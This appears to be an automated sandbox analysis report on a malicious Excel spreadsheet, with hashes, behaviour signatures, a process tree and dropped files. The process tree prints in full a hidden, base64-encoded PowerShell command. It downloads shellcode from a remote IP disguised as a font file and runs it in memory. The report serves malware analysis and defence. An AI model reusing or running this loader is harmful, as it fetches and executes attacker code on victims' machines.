Analysis

  • max time kernel
    14s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2024 22:01

General

  • Target

    3856ab552bd446734778d5a6464a7e47118a94a5bfe5d7e9789be4981441a554.xls

  • Size

    46KB

  • MD5

    82b02016493053970e5d6d964a582451

  • SHA1

    f5dd08d16ebe4381f55ab68d145eed1bc6f8b420

  • SHA256

    3856ab552bd446734778d5a6464a7e47118a94a5bfe5d7e9789be4981441a554

  • SHA512

    613fe26a3dc7061d3c3e558f95852d3925f90718f730b86299ae156f899a6ae0b2d98f7d8489515dcdfdb4f38d1c7e61da4b08208893c042beb0db8e18747355

  • SSDEEP

    768:V4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:SSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\3856ab552bd446734778d5a6464a7e47118a94a5bfe5d7e9789be4981441a554.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2132
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2852
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j3awebk8.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2912
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES24FF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC24FE.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2820

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES24FF.tmp

    Filesize

    1KB

    MD5

    607e12daeb53e2ac513a71e93a2fc3e3

    SHA1

    da5b1f225a04a6389d4940dcb6d09a787585013e

    SHA256

    c1c614d8568a0bad93876850a8192b78c021ab252303fc03d9cc5048544a0378

    SHA512

    9261c784f84d8bc340dbdcb1bf52af7ed08f621cf2e21b063ae11a1af330c60042470298d3a5dd3c6ac613f24a94608a3412802b10d617b42af973129da11995

  • C:\Users\Admin\AppData\Local\Temp\j3awebk8.dll

    Filesize

    3KB

    MD5

    ac81917006a7a4c1466b3b2ec7eb5d22

    SHA1

    fc8b9cd6161500779439e6c3ac91caa322c44a64

    SHA256

    937aed5a6a8dd011a72f0afc85eb400ab093a7a7b83474aaa819a6ca215de61a

    SHA512

    e8fb13823be041d9bf7758a23ee78919c09d16024c7e365bee4a612fff3cc82cf94519ab89c49c5db1ba14b5cc45d17905c207228a3ceb2488cb0865a1d78133

  • C:\Users\Admin\AppData\Local\Temp\j3awebk8.pdb

    Filesize

    7KB

    MD5

    7317820313fa259a0161611917f283bc

    SHA1

    7ad25afee4c5255092290a68b69e7bd280d466b0

    SHA256

    ac622fd83ac90fc518f2f2b43e7ccfc8d57a8fb8356d48576f7cb0bf006d22e3

    SHA512

    21d1c80279ecce167c62f9870f646fca08fb99f492dbba32decbbb0dc340757cf48172870a24bc2fb7cca087adf4b9e21e82e3dfd68c173e6f37ac3ba653b96a

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC24FE.tmp

    Filesize

    652B

    MD5

    ffde7640fcad3841da1027ba46f364ee

    SHA1

    071917d70e646306d142910ea7722336a172a1ee

    SHA256

    652c2618e6ec33f08d5302b6df3f7b2eb30eaa0e38e90d0125c14ab186560947

    SHA512

    01eeb1e519380894fe85dba4b70fc51938bd4b03f1e94087a71ed9584bb20c3fb61cb3dd0073cab79e846b123cac2b346487a4b5933cf3914884f11fb4bf5339

  • \??\c:\Users\Admin\AppData\Local\Temp\j3awebk8.0.cs

    Filesize

    631B

    MD5

    f4dd5c682eb7b3b679f084261bfc7c4c

    SHA1

    70f75d7a4e42c185eb09139ed3c6f7338a2219c2

    SHA256

    2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

    SHA512

    8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

  • \??\c:\Users\Admin\AppData\Local\Temp\j3awebk8.cmdline

    Filesize

    309B

    MD5

    377386256270629beb5135b5d50fbccd

    SHA1

    8c0101535b2630166e87b0787868f559f61ba4d4

    SHA256

    a87a079ed804008c398f9be0e718af3629dd524c329dd087c3cda229017efa5c

    SHA512

    bd4bed637bf718a0913bd55ed638afd97c8cd7058df21273a25e0831e086630e07abb056a0464fdf11a1fbecdaa1e3d7d37d8f74fa48398ab86ca53f02009c1e

  • memory/2132-9-0x0000000006E00000-0x0000000006F00000-memory.dmp

    Filesize

    1024KB

  • memory/2132-8-0x0000000006E00000-0x0000000006F00000-memory.dmp

    Filesize

    1024KB

  • memory/2132-1-0x000000007293D000-0x0000000072948000-memory.dmp

    Filesize

    44KB

  • memory/2132-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2132-27-0x000000007293D000-0x0000000072948000-memory.dmp

    Filesize

    44KB

  • memory/2132-28-0x0000000006E00000-0x0000000006F00000-memory.dmp

    Filesize

    1024KB